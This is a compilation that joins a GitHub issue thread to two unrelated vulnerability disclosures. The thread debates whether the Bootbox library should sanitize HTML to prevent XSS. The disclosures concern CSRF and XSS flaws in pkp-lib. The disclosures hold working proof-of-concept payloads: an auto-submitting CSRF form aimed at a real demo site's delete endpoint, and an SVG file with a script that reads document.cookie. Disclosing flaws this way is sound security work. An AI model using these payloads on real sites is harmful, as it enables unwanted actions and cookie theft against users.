I'll look into whether it's relatively easy to add something to sanitize message and title content, but I a) really don't want to write that myself, and b) really dislike adding another dependency to Bootbox.

Yeah I get that.

Maybe just a quick note in the docs about sanitizing your inputs before passing it in to bootbox?

The bootboxjs website is generated from the gh-pages branch, so if you would like to take a crack at that, I'd be happy to review a pull-request. Otherwise, it may be a little while before I get to something like that - what little free-time I have to work on projects like this has been spent trying to get the v5x branch ready for becoming the master branch.

oh yeah, didn't know the docs were on github too. i'll take a crack at it.

I'm not sure if this is very hard to fix but I think the current implementation is useful in many cases.  
So from a user perspective I want to still be able to show a dialog with HTML elements inside.

From implementation perspective all that needs to be done is to use .text method instead of .html  
And I think you can add a constructor called like Bootbox.Unsafe that if provided for message or title will be entered into the DOM using the html method. So unless user wraps the strings in this object explicitly the data will be parsed as text only.

If it sounds reasonable I can probably try to submit a pull request

@yonjah I'm not entirely sure I understand what you're suggesting.

I won't be changing the internals to use text() instead of html() - that would break most of the existing functionality, since the message and title options have always allowed HTML.

I'd have to reiterate my previous statement: sanitizing content seems out of scope for this plugin. If I can get 5.0 squared away and pushed to master, _maybe_ I could think about adding an option to allow a sanitizer to be passed in - that would allow devs to sanitize content, without having another large chunk of code for me to maintain.

@tiesont Using text() method by default seem like the best fix to this problem.  
But it is indeed a breaking change.

I wouldn't bother with implementing any solution that can't be activated by default since users will need to know to activate it. So it's not much better than changing the documentation and let users decide how they want to handle this issue.

BTW it seem like SweetAlert decided to solve this issue by offering a content property  
Which will contain an actual element to be injected into the dialog -  
t4t5/sweetalert#845  
It's also have the extra benefit of allowing easier integration with UI frameworks

@vedmant  
you just need to make sure you pass your input through a sanitizer before passing it into this library.

@vedmant "fix it" implies that something is broken. I think I've made it clear that I don't consider this a "bug" or problem with Bootbox, in spite of whatever external sites want to claim. If not, well, here it is:

I don't consider sanitizing the content that gets passed to the message option as in-scope for Bootbox, and it's been a feature for quite some time to allow HTML to be be passed in, allowing messages shown by bootbox.alert(), bootbox.confirm(), and bootbox.prompt() to have formatted text. It's not up to bootbox to decide if a programmer has a valid use or not to inject a <script> tag, which in and of itself is not malicious - it's whatever code it contains and what the intent was that matters.

@JesseDahl @tiesont I don't have security concerns here, the issue is that Snyk is reporting this package as not safe. Which required to manually add it to Snyk ignore list on every project, which is also a bad idea as if there any real security issue then it also will be ignored and not reported.

This gridlock needs to be resolved in some way, I enjoy using this package safely but cannot get a clean build without getting dirty :(

@nullivex I hope this doesn't come across poorly, as there's no malicious intent behind it, but I'm not terribly concerned about what external sites report about this library. Bootbox works the way it does by intent, allowing users to have formatted text in their messages (which is no different than normal Bootstrap modals). I'm not going to change the default behavior and force users to enable HTML via an option, which is probably what I would have to do to make HackerOne et al happy.

It's always an option to fork this library, make that change, and create a new npm package, if someone really wanted to use Bootbox without warnings, but I'm not interested in doing so at the moment. Granted, I'm not the owner of this package, but since @makeusabrew hasn't been seen in a while, the most active collaborator (which seems to be me) pretty much becomes the de facto decision maker.

As a note, there is a recent fork that possibly has fixed some of these issues, found here: https://github.com/lddubeau/bootprompt - you may want to investigate if that works better. At the least, no one has filed a vulnerability report on that package yet, so you wouldn't get the warnings you're seeing here.

@tiesont Thanks for getting back to me. I appreciate the time you took and sorry to bother you in the first place. I understand that life was all good until a security researcher decided something arbitrarily bad could happen when this library is used improperly. (Typically my thumb hurts after hitting it with a hammer so I think you are completely in the right!) Rather than continue to prod you over this and try to push you a direction you would rather not go. I would like to ask what you would see as a fitting solution to this issue? It could be important for other projects. I think you have ran into a reasonable disagreement with the security research done. I agree with your stance and wish the advisory could be adjusted personally. That being said. I would not mind hearing your opinion.

I hope this finds you well!

@nullivex I wouldn't call it "bothering" me. I understand that having that warning on the package is a problem for some users, but there's not a whole lot I can do about it. Someone decided that this small(ish) library needs to act the same way as a large framework like React, so now it's seen an issue.

As I noted, using bootprompt might a option - it's Bootbox ported to TypeScript, plus whatever changes that author has made since then. I did a quick scan, and it doesn't seem to use the html() function, which seems to be what all the fuss is about.

There are also other packages that have ported Bootbox to be jQuery-free, so that it can used in frameworks like Angular (I think one was called ng-bootbox, but it's been a bit since I last looked), so if you're using something like React or Angular, you might want to investigate those options.

I have thought about looking into what Bootstrap uses internally, since I think they have some form of HTML sanitizing built into their JavaScript components, if I recall correctly. I know that **I** don't have the requisite knowledge to build my own sanitizer, and there isn't much of a point of introducing an external dependency (developers can do that themselves, after all) if I were to rely on some other library (other than Bootstrap) to sanitize content.

Bootstrap's sanitizer functions (https://github.com/twbs/bootstrap/blob/master/js/src/util/sanitizer.js) seem fairly straight-forward, but none of these functions are part of it's public API. I suppose I could pull the code from that file into this project, but that would require manually updating the functions whenever Bootstrap fixes something. I'll consider it, but not promising anything.

@tarlepp Thoughts?

Using that bootstrap sanitizer would be nice addition, although using it won't solve all possible attacks with inputs (eg. SQL injections, etc.) - We cannot know how those input data are used in backend side and that isn't something that bootstrap/bootbox itself should do.

I've pinned this issue, to make it easier to find (and hopefully reduce duplicate issues being raised).

And imho this issue is not solved yet, so it should not be closed one - there is some improvements that could be done to bootbox side for this.

> it won't solve all possible attacks with inputs (eg. SQL injections, etc.)

@tarlepp could you elaborate on this point  
As far as I know bootbox only injects input into the DOM so it make sense to handle input in a safe manner preventing XSS and DOM related injections.  
Does bootbox send SQL queries with inputs? if not how can it cause SQL injections ?

BTW as implemented in #699 the fix desn't require any sanitation and allows to keep the exact same functionality with a minor API change

@yonjah Minor API change, yes. Major change in functionality, also yes, and I'm not okay with that.

@tarlepp was just making a point that user input should never be trusted implicitly - Bootbox doesn't do anything that involves back-end code.

@tiesont what is the major functionality change introduced in #699 ?

> @tarlepp was just making a point that user input should never be trusted implicitly - Bootbox doesn't do anything that involves back-end code.

So if it only handles the DOM I would say this is the only kind of injections we should worry about.

@yonjah Making HTML rendering (for the various options which currently allow it) require an extra step, rather than the default behavior, is a major difference, IMO, which is the majority of what your pull-request does. Anyone who's okay with adding something like

as their message option should be capable of using

$('<b>Hello World!</b>').sanitize() // assuming some external sanitizing library or function

@tiesont so from functionality perspective there is no issue the only change is API change -

bootbox.alert('<b>Hello World!</b>'); //Old API
bootbox.alert($('<b>Hello World!</b>')); //new API

Functionality is identical in both cases.

I agree that from API change adding some sanitize call when you need the HTML functionality might not be an issue but it probably wont solve the security issue. It will introduce the exact functionality change you are trying to prevent and when you don't need it it can be a major pain -

bootbox.alert(\`Hello ${user.name}\`);
bootbox.alert(request.error);

This examples are safe to use after the API change but are completely vulnerable with the current API.  
if the API expect a call to some sanitize function before passing the input in it will still be vulnerable.

@yonjah I think we'll have to agree to disagree. I respect your input and value the time you've put into this, but I don't agree with the changes you want to make, so **I** won't be pulling them in.

Hi all,

Forgive me if this is a noob question, but doesn't dev tools give the ability to execute arbitrary javascript code on a page **in the same way** that this bootbox "vulnerability" gives? Sure, maybe a malicious user can inject code into the bootbox callback, but then it's still running frontend code which we already know is manipulable by the user.

If this ability to execute code gives malicious users a route to cause arbitrary code to be executed for anyone other than themselves, then I definitely want to fill in the gaps in my understanding.

Ryan

It could be a "stored XSS" type of attack. Some malicious user enters some value that gets stored in the backend. Then later some other user accesses some record or piece of information, and that stored bit of xss payload gets loaded into the app and into bootbox somehow.

In this case the user input is indirect and stored on the backend first before becoming a problem.

Is there any update on the topic? My pipeline warns about this XSS issue and it's not fixable for me. If it's not an issue, maybe this can be sorted out with the security repo to remove the warning there?

@GitRon It's still an issue in that the notice isn't going to go away unless we change the internals of Bootbox to not use jQuery's .html() function or introduce an internal sanitizer. I'm not doing either anytime soon, as mentioned above and in related issues.

If you're never going to use HTML in your messages or titles, you can fork this repo and replace any uses of .html() with respect to the message and title options, which would probably let your fork pass whatever tool was used to determine Bootbox is vulnerable to injection.

This was referenced

Sep 6, 2021

> @tiesont, what about having bootbox accept a user provider sanitizer function, like prototyped in https://github.com/makeusabrew/bootbox/compare/master...gberaudo:accept\_global\_sanitizer?expand=1. This would:

@gberaudo That's been suggested before, but doesn't really solve the problem, at least as far as these "scan this project for issues" sites are concerned. There's nothing stopping anyone from running user input from an external sanitizer already (which seems like a completely rational solution). I suppose it would be a little less work from a developer's standpoint - supply an sanitizer, then all future values are cleaned automatically. But then again, that's solvable with a global helper function, so...

The core of the issue is that there seems to be an expectation that our small library, which has been around a while and was never built to be used in the context of things like React, should provide the same sort of "protect me from myself" functionality that much larger libraries do. **I** don't have the time or inclination to support an embedded sanitizing function, nor does @tarlepp. Since we're pretty much it as far as active collaborators, well, you get what we're okay with supporting.

If we ever decide to do a Bootbox 6, sure, I'll make sure that there's a way to define a sanitizer (and provide some sort of basic cleaning), but that's a project for next year, _maybe_...

Thanks for your reply @tiesont. I have double checked the discussion in this thread and I did not see where a similar proposition has been made before. Maybe it was proposed in another place? If you have a pointer to it, I would appreciate it because I really like to understand the situation here.

So far, I get that you want:

*   no breaking changes (which is fair);
*   no undue maintenance burden (writing an internal sanitizer function is a no-go).  
    Also you don't care about bootbox being flagged as "unsafe" by companies like Snyk.

I am completly aligned with what you wrote, it is fair and reasonable to me. That is why I proposed a solution that has the merits of:

*   closing this issue;
*   being easy to implement and maintain;
*   being opt-in, no breaking change;
*   being flexible (use or not a sanitizer function, choose the one you like, implement your own, ...);
*   addressing the problem of unsafe usage of the lib: as soon as a sanitizer is defined, all subsequent usages of bootbox will be secure which is a great step forwards for me and my team, making us confident to press the "I know what I am doing button and whitelist this library".

That is as far as I can go to try to explain and convince you that the current issue is addressable upstream in a sane way.  
Thanks for the great discussions and have a good day.

CVE-2023-46998: Document or fix possible XSS vulnerability (via jquery) · Issue #661 · bootboxjs/bootbox

Cross-Site Request Forgery in GitHub repository pkp/pkp-lib prior to 3.3.0-16.



Description

CSRF Delete Navigation Menu Items

Proof of Concept

1 .Attack sends fake requests to users

    <html>
       <body>    
     <form action="https://demo.publicknowledgeproject.org/ojs3/testdrive/index.php/testdrive-journal/$$$call$$$/grid/navigation- 
       menus/navigation-menu-items-grid/delete-navigation-menu-item">      
      <input type="hidden" name="navigationMenuItemId" value="330" />    
      <input type="hidden" name="csrfToken" value="" />     
      <input type="submit" value="Submit request" />
     </form>
     <script>
           history.pushState('', '', '/');
            document.forms[0].submit();
           </script>
        </body>
      </html>
    

2 .User click, deletes unwanted Navigation Menu Items

Payload Poc

https://drive.google.com/file/d/15cjZ2oBeBmUx-C9\_kRqBXKMXLX8LU5Ew/view?usp=sharing

Video Poc

https://drive.google.com/file/d/1Bp1M3ifN9rXdxhjfyAIibmy0QFhYluEu/view?usp=sharing

**Impact**

Trick users to do unintended actions.

CVE-2023-5900: CSRF Delete Navigation Menu Items in pkp-lib

Cross-site Scripting in GitHub repository pkp/pkp-lib prior to 3.3.0-16.



**Description**

I tested the demo site you provided. I see that there is a file upload vulnerability which can lead to XSS. Hope you check and find a solution as soon as possible.

**Proof of Concept**

link video Poc

https://drive.google.com/file/d/1LAcTulbfhGJfCmWdIel9e-Sk\_\_uoQbDq/view?usp=sharing

**Steps**

1 .Login as account demo

2 .Access the module issues

3 .Then create an issue

4 .Upload an SVG file with the following content:

             <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
                 <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
                 <script type="text/javascript">
                         alert(document.cookie);
                 </script>
              </svg>
    

5 .Save the issue and access the newly created issue, then access the just uploaded SVG file and the payload will be executed

**Impact**

XSS (Cross-Site Scripting) is a type of web security vulnerability caused by improper input validation and inadequate data sanitization in a web application. It occurs when an attacker injects malicious scripts (usually in the form of HTML or JavaScript) into a website's database or storage, which is then fetched and displayed to unsuspecting users. These scripts are executed in the browsers of those who visit the infected page, enabling the attacker to steal sensitive information, such as login credentials or personal data, and potentially take control of the user's account or perform malicious actions on their behalf. To prevent stored XSS, developers must implement proper input validation and output encoding to ensure that user-supplied data is treated as plain text and not executed as code on the web page.

Tag

#git